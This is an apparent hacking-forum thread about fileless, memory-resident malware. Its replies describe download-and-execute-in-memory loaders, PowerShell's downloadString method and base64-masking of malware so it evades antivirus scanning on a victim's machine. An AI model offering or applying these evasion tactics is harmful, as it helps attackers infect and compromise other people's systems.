1. To visit protected / private sections of the forum you must be connected with your user account. If you are not yet a member of our forum, you can create it now for free!.

User Tag List

Thread: Memory based viruses in non-interpreted languages?

Results 1 to 4 of 4

  1. #1
    Junior Member
    Join Date Jul 2018
    Posts 6
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    2 Post(s)

    Memory based viruses in non-interpreted languages?

    I'm not sure if this is more of a question or more of an attempt to make a discussion. Well, probably both However, since these viruses are getting increasingly popular, I've thought about opening a thread about it.

    In short a memory based virus is a virus that relies on execution from memory instead of files. The advantages are extremely huge - anti-viruses that don't scan memory or evaluate damage caused by the virus stand no chance against it, leaving only few anti-viruses viable opponents.

    In interpreted languages it is fairly easy. Simply call it through eval. However, using it with interpreted languages is kind of meh, because they don't have as much power as low level languages (Although they still can do some nasty damage).
    The only issue with using low level languages is, it's not the easiest to create a dynamic compiler

    So I wonder, if you were to make a memory based compiler, how would you, if you would, go for it? I don't mean a step by step guide, since that is rather impossible. My current favorite is using nw.js, because I can combine javascript with c++, but many avs label nw.js as a virus, so it's not the most viable choice.
  2. #2
    Pernat1y's Avatar
    Senior Member
    Join Date Dec 2007
    Location Internets
    Posts 1,999
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    11 Post(s)
    In most cases "fileless" part (e.g. your js/powershell/vbs script) just downloads and executes (preferably in memory, otherwise it will be pointless) main part of your application which can be in any common language.
    PMs about malware = instant trip to ignore list.
  3. #3
    sagitari0's Avatar
    Junior Member
    Join Date Dec 2017
    Posts 11
    Like (Stats)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    1 Post(s)
    In most cases "fileless" part (e.g. your js/powershell/vbs script) just downloads and executes (preferably in memory, otherwise it will be pointless) main part of your application which can be in any common language.
    Using powershell, for example, you can use 'downloadString' method. That download the file direct to memory.
    But remember, AVs dont scan de memory but scan what your machine is downloading... to bypass this, you have to download the malware maskared... I like very much of base64 , you convert the malware bytes to base64, drop to victim, and decode.
    sorry for my english, its not my native language

    padwan in malware, padwan in hacking, jedi to find bugs in my life.

    WickrMe : sagitari0
    Jabber: sagitari0@exploit.im
  4. #4
    Junior Member
    Join Date Jul 2018
    Posts 6
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    2 Post(s)
    @sagitari0 Actually, the top-tier av companies have already realized the threats of memory based viruses and they will scan your memory. Eset even publicly declares it as a feature. However, memory scan is quite difficult to make and quite easy to bypass, since it's a level 1 process.
  5. Likes sagitari0 liked this post

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Replies: 0
    Last Post: 26-07-2017, 16:19
  2. how to make the controle support unicode languages?
    By OussamiO in forum Visual Basic Help
    Replies: 7
    Last Post: 07-01-2011, 07:17
  3. What languages should i learn?
    By m1ndmesser in forum Off-Topic
    Replies: 18
    Last Post: 11-08-2010, 12:33
  4. Does Avira aggressive in other languages than VB6
    By rocker in forum General Programming Help
    Replies: 14
    Last Post: 28-04-2010, 12:48
  5. Free direct link hosting that doesn't scan for viruses
    By DWOF in forum Tutorials and Articles
    Replies: 7
    Last Post: 08-05-2009, 03:37

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts